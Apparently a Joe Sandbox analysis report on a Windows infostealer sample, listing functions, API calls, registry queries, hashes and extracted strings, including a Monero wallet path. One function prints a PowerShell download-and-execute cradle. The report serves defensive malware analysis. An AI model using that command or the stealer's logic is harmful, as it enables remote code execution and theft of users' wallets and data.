                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 25e6de623eede54569204b696e3ac1bdb3cfc7f6ceb08771526e826b8f368cef
                                        • Instruction ID: 2bc31df3598b4c3253c38e3aec46fc34f3a3242664f43d265291cac188a6283e
                                        • Opcode Fuzzy Hash: 25e6de623eede54569204b696e3ac1bdb3cfc7f6ceb08771526e826b8f368cef
                                        • Instruction Fuzzy Hash: 7721F6B1910228ABDB24DB54DC85FE9B7B8FB48701F0086D8E609A6180DE716A85CF94
                                        Function 00927690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009276A4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009276AB
                                        • RegOpenKeyExA.ADVAPI32(80000002,006ABFA0,00000000,00020119,00000000), ref: 009276DD
                                        • RegQueryValueExA.ADVAPI32(00000000,006BDFC0,00000000,00000000,?,000000FF), ref: 009276FE
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00927708
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 760ce3c3c43105e33fb521fa81fc5bc713520a8a366f1ab323c91731ea62e6bc
                                        • Instruction ID: 295b56314a6c16f230fac185b47ee8f7867d1285545750b30fd361e040042740
                                        • Opcode Fuzzy Hash: 760ce3c3c43105e33fb521fa81fc5bc713520a8a366f1ab323c91731ea62e6bc
                                        • Instruction Fuzzy Hash: B5014FB5A04308BFDB00DBE4EC59F6DB7BCEB48702F104594FA04B7294EA7499048F51
                                        Function 00927720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927734
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092773B
                                        • RegOpenKeyExA.ADVAPI32(80000002,006ABFA0,00000000,00020119,009276B9), ref: 0092775B
                                        • RegQueryValueExA.ADVAPI32(009276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0092777A
                                        • RegCloseKey.ADVAPI32(009276B9), ref: 00927784
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: c2fc9a4bb455959c46b05355c665d1d35bccdf1c9382bcbf6219c8147798063e
                                        • Instruction ID: 64b37819ded1e9115482bbd54286d34381d3acfc3e876cb881c505ce9a7ed216
                                        • Opcode Fuzzy Hash: c2fc9a4bb455959c46b05355c665d1d35bccdf1c9382bcbf6219c8147798063e
                                        • Instruction Fuzzy Hash: 0601F4B5A40308BFD700DBE4DC49FAEB7B8EB48705F104695FA05B7281DA7059408F51
                                        Function 009199C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                        • ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                        • LocalFree.KERNEL32(0091148F), ref: 00919A90
                                        • CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 9f94b449426ccb0d70c7fe8dd0f5833ef47ff40275afc434ef870bf2c4261fd1
                                        • Instruction ID: ecb4b1cbc255769e876f2461688dc3d8e438ef5d75e75d7664faa234bd991594
                                        • Opcode Fuzzy Hash: 9f94b449426ccb0d70c7fe8dd0f5833ef47ff40275afc434ef870bf2c4261fd1
                                        • Instruction Fuzzy Hash: 17312A74A00209EFDB14CF94D895BEE77B9FF48301F108198E901A7290DB75A985CFA1
                                        Function 00922C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00922D85
                                        Strings
                                        • <, xrefs: 00922D39
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00922D04
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00922CC4
                                        • ')", xrefs: 00922CB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: d7062f5a0cac7100957e7d69f9f7e42a8ff99cf32b7494a2dba4909ec0f52dd7
                                        • Instruction ID: e3063e2e6445b9f8fc2df18137ebdfa8332d8efe927bf819dca40c9bbb6b9939
                                        • Opcode Fuzzy Hash: d7062f5a0cac7100957e7d69f9f7e42a8ff99cf32b7494a2dba4909ec0f52dd7
                                        • Instruction Fuzzy Hash: D641DF72D102189BDB14FFA0E892BDDB778AF94300F404159F006A7199DF746A4ACF95
                                        Function 00919E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00919F41
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$AllocLocal
                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                        • API String ID: 4171519190-1096346117
                                        • Opcode ID: 7d414f1ec727524cd4eb585a64fc33bfbf8603cb7bf6b7046a034eb75175116e
                                        • Instruction ID: 191a89a96cfd2b6a75bd85e629b8f9e5d5156aed3aaeb65db7c7a5f3b3c9bb4a
                                        • Opcode Fuzzy Hash: 7d414f1ec727524cd4eb585a64fc33bfbf8603cb7bf6b7046a034eb75175116e
                                        • Instruction Fuzzy Hash: F3616D71A0021CAFDB24EFA4DC96FEE7779AF85304F408018F90A9B195EB746A45CB52
                                        Function 00926920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 0092696C
                                        • sscanf.NTDLL ref: 00926999
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009269B2
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009269C0
                                        • ExitProcess.KERNEL32 ref: 009269DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 28dc1efa294c6e49fefd70e4a3eaf5a3ad44d50c697bde337823baee55a7177c
                                        • Instruction ID: 89503bf2289dfd05c186966f7a5454d1638ba391f0146b7076c2b754f4a10313
                                        • Opcode Fuzzy Hash: 28dc1efa294c6e49fefd70e4a3eaf5a3ad44d50c697bde337823baee55a7177c
                                        • Instruction Fuzzy Hash: DD21E9B5D00218ABCF04EFE4E945AEEB7B9BF48301F04856AE406F3254EB345604CBA9
                                        Function 00927E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927E37
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00927E3E
                                        • RegOpenKeyExA.ADVAPI32(80000002,006AC010,00000000,00020119,?), ref: 00927E5E
                                        • RegQueryValueExA.ADVAPI32(?,006BDB40,00000000,00000000,000000FF,000000FF), ref: 00927E7F
                                        • RegCloseKey.ADVAPI32(?), ref: 00927E92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 2a0fdc2faeb053f67359fd937fb91fe8998e79c59007c20a6b9f75e1f27339b2
                                        • Instruction ID: db4c6e0b0dd9450350c8d5dd6f133c5436bcab6543940c24fee7fe17347aea8a
                                        • Opcode Fuzzy Hash: 2a0fdc2faeb053f67359fd937fb91fe8998e79c59007c20a6b9f75e1f27339b2
                                        • Instruction Fuzzy Hash: C7114FB1A44305EBD710CBD4ED59F7BBBB8FB48711F104259F605B7294DB7459008BA1
                                        Function 00929260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • StrStrA.SHLWAPI(006BDF78,?,?,?,0092140C,?,006BDF78,00000000), ref: 0092926C
                                        • lstrcpyn.KERNEL32(00B5AB88,006BDF78,006BDF78,?,0092140C,?,006BDF78), ref: 00929290
                                        • lstrlen.KERNEL32(?,?,0092140C,?,006BDF78), ref: 009292A7
                                        • wsprintfA.USER32 ref: 009292C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: a69b5294445f9139f3cb2ee1ac6d31f19a318c88e6d92cc1bc654bc6262017a8
                                        • Instruction ID: 1bd4c8c55f6e38a5b6827bbbce5b36cba1ba8e87c049f16526376608bef07574
                                        • Opcode Fuzzy Hash: a69b5294445f9139f3cb2ee1ac6d31f19a318c88e6d92cc1bc654bc6262017a8
                                        • Instruction Fuzzy Hash: 8801C075500209FFCB44DFDCD954EAD7BB9EB48355F108688F909A7204CA319A40DBD1
                                        Function 009112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009112B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009112BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009112D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009112F5
                                        • RegCloseKey.ADVAPI32(?), ref: 009112FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: d594193c30f83b0decbd129fcbd56c5433882c2b82f629a64baf943bdc8de83a
                                        • Instruction ID: c73693b10cc944d7baa358017896c01a83c6cdb6db2e5d5a446224ed03856242
                                        • Opcode Fuzzy Hash: d594193c30f83b0decbd129fcbd56c5433882c2b82f629a64baf943bdc8de83a
